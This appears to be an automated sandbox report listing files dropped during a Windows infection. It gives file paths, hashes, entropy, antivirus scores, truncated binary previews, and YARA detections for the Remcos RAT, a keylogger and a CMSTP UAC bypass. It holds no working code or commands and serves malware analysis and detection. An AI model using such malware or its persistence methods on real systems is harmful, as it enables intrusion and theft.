                                      Preview:s.5q.5q.5p.5q.54.5d.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..e4..tU..\...F...i'..Q...i#..G...P...e...G...i#..G...5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..[...T...P5..5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..G...P9..A...Pp.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..{4...,..V...Z...{5..s...P...^p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5...^..B.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):1234044
                                      Entropy (8bit):7.626169702823665
                                      Encrypted:false
                                      SSDEEP:24576:CNyjiDKtPtRGaoxz+LtafJwPxWE9rupTi1pHxLUlitmuUkdUC+7m4/nz9qVv9Pye:D/twxKL8AvcTifHxftmul4m4/nzUN9ae
                                      MD5:2DE0E9B8C7CC678C2C310FDC6BE1E6BA
                                      SHA1:6994E10583C32897ABF910AC3F29E4EA7B3ACC75
                                      SHA-256:3B1DA5F941FBEF8A65D0DD0D0B2ED89B76D9DA2380ED1A324290CB889FA1A902
                                      SHA-512:AFD6FA3C4862634517C71A9EB783FF111771A7F45E788C27D61DB4CB89BA62BFCD96EE22B392DF683B0B65C2CB0DB5D9B65C486A118877350E95C4F2324373EC
                                      Malicious:false
                                      Preview:s.5q.5q.5p.5q.54.5d.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..e4..tU..\...F...i'..Q...i#..G...P...e...G...i#..G...5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..[...T...P5..5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..G...P9..A...Pp.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..{4...,..V...Z...{5..s...P...^p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5...^..B.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5
                                      Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):1234044
                                      Entropy (8bit):7.626169129003627
                                      Encrypted:false
                                      SSDEEP:24576:KNyjiDKtPtRGaoxz+LtafJwPxWE9rupTi1pHxLUlitmuUkdUC+7m4/nz9qVv9Pye:7/twxKL8AvcTifHxftmul4m4/nzUN9ae
                                      MD5:B51F5C77F1DCB37CD0B9CD0D92B9497A
                                      SHA1:53EDE7AE793F9D460FABE2706B8CF7F8863EC305
                                      SHA-256:B88B072E4626E1C45BAE22710BE2578D9807B9D96B3304998A577C2F9B5C00FE
                                      SHA-512:5F7D484B4F120E46B9EEE0162E2C856F7B6AFFA9A276C5825065D493423921FEA944CDF54BD9C9B7530C2B7ACB822F429728EFDF58A91B94CB12E18CB1C96478
                                      Malicious:false
                                      Preview:s.5q.5q.5p.5q.54.5d.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..e4..tU..\...F...i'..Q...i#..G...P...e...G...i#..G...5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..[...T...P5..5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..G...P9..A...Pp.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..{4...,..V...Z...{5..s...P...^p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5...^..B.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):500224
                                      Entropy (8bit):6.590620352205087
                                      Encrypted:false
                                      SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                                      MD5:6CA401F82443B673FCA7D7DDB0A05357
                                      SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                                      SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                                      SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, Author: unknown
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 87%
                                      Joe Sandbox View:
                                      • Filename: epht1Y3TGZ.exe, Detection: malicious, Browse
                                      • Filename: 55Ka50lb6Z.bat, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):500224
                                      Entropy (8bit):6.590620352205087
                                      Encrypted:false
                                      SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                                      MD5:6CA401F82443B673FCA7D7DDB0A05357
                                      SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                                      SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                                      SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\lejp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\lejp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\lejp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\lejp, Author: unknown
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\lejp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\lejp, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 87%
                                      Joe Sandbox View:
                                      • Filename: epht1Y3TGZ.exe, Detection: malicious, Browse
                                      • Filename: 55Ka50lb6Z.bat, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):500224
                                      Entropy (8bit):6.590620352205087
                                      Encrypted:false
                                      SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                                      MD5:6CA401F82443B673FCA7D7DDB0A05357
                                      SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                                      SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                                      SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\paogviura, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\paogviura, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\paogviura, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\paogviura, Author: unknown
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\paogviura, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\paogviura, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 87%
                                      Joe Sandbox View:
                                      • Filename: epht1Y3TGZ.exe, Detection: malicious, Browse
                                      • Filename: 55Ka50lb6Z.bat, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):500224
                                      Entropy (8bit):6.590620352205087
                                      Encrypted:false
                                      SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                                      MD5:6CA401F82443B673FCA7D7DDB0A05357
                                      SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                                      SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                                      SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, Author: unknown
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 87%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02 2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
                                      Category:dropped
                                      Size (bytes):939
                                      Entropy (8bit):5.086548511212798
                                      Encrypted:false
                                      SSDEEP:24:8AZeR2Yt6JqB2c9drpE8x3hALprourEJgJtm:8AZe5t6JG2cTra8w9tAJgJt
                                      MD5:F2F09DD8BC63832A6A2249186765CED6
                                      SHA1:4FD9FB6B14EEE26EEEA5E53A0467F4D64AB791BB
                                      SHA-256:57D07B671930537C3A5E935EBD8606645C02C801C39CBA249B62E1EC14B084B0
                                      SHA-512:97DD08802BD5C5D419163F97123D885166354E17AA34B921CC3B11469E9B33BC5C2E8F6B9BAF55202ABDBDE7DA32267A5B16C3DE6472F3261230A9D8B45B716A
                                      Malicious:false
                                      Preview:L..................F.... ...ey.h....;..h.......A............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...6...h...u..Xv.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=9Y7...........................3*N.A.p.p.D.a.t.a...B.V.1.....9YB...Roaming.@......EW.=9YB...........................:...R.o.a.m.i.n.g.....b.1.....9YB...RUY_DR~1..J......9YB.9YB.....8.....................>...R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9YB.9YB...........................d...D.Z.I.P.R...e.x.e.......h...............-.......g.............l.....C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..<.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......632922...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02 2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
                                      Category:dropped
                                      Size (bytes):939
                                      Entropy (8bit):5.086548511212798
                                      Encrypted:false
                                      SSDEEP:24:8AZeR2Yt6JqB2c9drpE8x3hALprourEJgJtm:8AZe5t6JG2cTra8w9tAJgJt
                                      MD5:F2F09DD8BC63832A6A2249186765CED6
                                      SHA1:4FD9FB6B14EEE26EEEA5E53A0467F4D64AB791BB
                                      SHA-256:57D07B671930537C3A5E935EBD8606645C02C801C39CBA249B62E1EC14B084B0
                                      SHA-512:97DD08802BD5C5D419163F97123D885166354E17AA34B921CC3B11469E9B33BC5C2E8F6B9BAF55202ABDBDE7DA32267A5B16C3DE6472F3261230A9D8B45B716A
                                      Malicious:false
                                      Preview:L..................F.... ...ey.h....;..h.......A............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...6...h...u..Xv.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=9Y7...........................3*N.A.p.p.D.a.t.a...B.V.1.....9YB...Roaming.@......EW.=9YB...........................:...R.o.a.m.i.n.g.....b.1.....9YB...RUY_DR~1..J......9YB.9YB.....8.....................>...R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9YB.9YB...........................d...D.Z.I.P.R...e.x.e.......h...............-.......g.............l.....C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..<.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......632922...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02 2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
                                      Category:dropped
                                      Size (bytes):939
                                      Entropy (8bit):5.086548511212798
                                      Encrypted:false
                                      SSDEEP:24:8AZeR2Yt6JqB2c9drpE8x3hALprourEJgJtm:8AZe5t6JG2cTra8w9tAJgJt
                                      MD5:F2F09DD8BC63832A6A2249186765CED6
                                      SHA1:4FD9FB6B14EEE26EEEA5E53A0467F4D64AB791BB
                                      SHA-256:57D07B671930537C3A5E935EBD8606645C02C801C39CBA249B62E1EC14B084B0
                                      SHA-512:97DD08802BD5C5D419163F97123D885166354E17AA34B921CC3B11469E9B33BC5C2E8F6B9BAF55202ABDBDE7DA32267A5B16C3DE6472F3261230A9D8B45B716A
                                      Malicious:false
                                      Preview:L..................F.... ...ey.h....;..h.......A............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...6...h...u..Xv.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=9Y7...........................3*N.A.p.p.D.a.t.a...B.V.1.....9YB...Roaming.@......EW.=9YB...........................:...R.o.a.m.i.n.g.....b.1.....9YB...RUY_DR~1..J......9YB.9YB.....8.....................>...R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9YB.9YB...........................d...D.Z.I.P.R...e.x.e.......h...............-.......g.............l.....C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..<.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......632922...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                      Process:C:\Users\user\DZIPR.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):354304
                                      Entropy (8bit):6.005348176071358
                                      Encrypted:false
                                      SSDEEP:6144:GBy1KULDZ+B55Lj5mCcBKyWm4IVFWyTBBa:x255L1mCcBKyWDsy
                                      MD5:AD28D4167571382569D2384FFD7BD2A9
                                      SHA1:EFC7534BCB1645D4056702E073519F571D8DB77B
                                      SHA-256:F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
                                      SHA-512:8F28867B46DD7A801CBF70D8D7FE5F2BFB8654A417C40BA264FAF81AF8BB1A28E1A1200FDC9828A4A4C6DF0A13817055290C16F9468D311B8D8049A2439348D9
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..~x..-x..-x..-_4.-...-_4.-m..-x..-...-q.X-a..-q.N-...-q.I-...-f.I-{..-q.G-v..-q._-y..-f.Y-y..-q.\-y..-Richx..-........PE..L......e...........!.....f...........I....................................................@.............................O... ................................p...&.................................. ...@...............(.......@....................text....e.......f.................. ..`.rdata..............j..............@..@.data...t~.......$..................@....rsrc...............................@..@.reloc..Rq...p...r..................@..B................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\DZIPR.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):8767704
                                      Entropy (8bit):7.112848215947183
                                      Encrypted:false
                                      SSDEEP:196608:zoR6Nv4zX/hW/7vpqCv3wrwxd8Sr3a8i5ynKVrzzky9WD9rrBrIrrsSrCrbrCrr+:6SAzXQjkCv3wrwxd8Sr3a8i5ynKVrzzq
                                      MD5:EC9CE1D67F98072281015C7726FBA245
                                      SHA1:E89B16265ACF4A251B527DDF22830F2650987263
                                      SHA-256:9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
                                      SHA-512:21DB8F3AE325021589DE9C2489AB2CE6814722A17A92476A56147478AA9767CE5C4769169F287060CC08AD76019178BA547FCEF32074EF1AFB1926845E7158E1
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.../..e..................J...;.......J...... J...@.............................................@............................L..F....R...3..............(....M.@.............................L.....................,.L.......L......................text.....I.......I................. ..`.itext..l+....I..,....I............. ..`.data........ J.......J.............@....bss..........K.......K..................idata...F....L..H....K.............@....didata.......L.......L.............@....tls....@.....L...... L..................rdata........L...... L.............@..@.reloc..@.....M......"L.............@..B.rsrc.....3...R...3...Q.............@..@....................................@..@........................................................
                                      Process:C:\Users\user\DZIPR.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):975374
                                      Entropy (8bit):7.888212877886324
                                      Encrypted:false
                                      SSDEEP:24576:uLAGNVG5bTGfhtqkZEgJUyAre0DnrDJLJ1IC:KTp/qkqIArtHJd1IC
                                      MD5:4649F3A4E58C6040B07F6D486C149A71
                                      SHA1:64F8FC631C5FB4E5F6BC20C207047D8E2B500587
                                      SHA-256:5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
                                      SHA-512:4E1B229D30403B594E992FE0893E568161C8D901FE20461093D11159AB03B5DD410D1834BC64AC4CCC39D4F6B072946703F06EEB982D79B1C9A1B773B57013B7
                                      Malicious:false
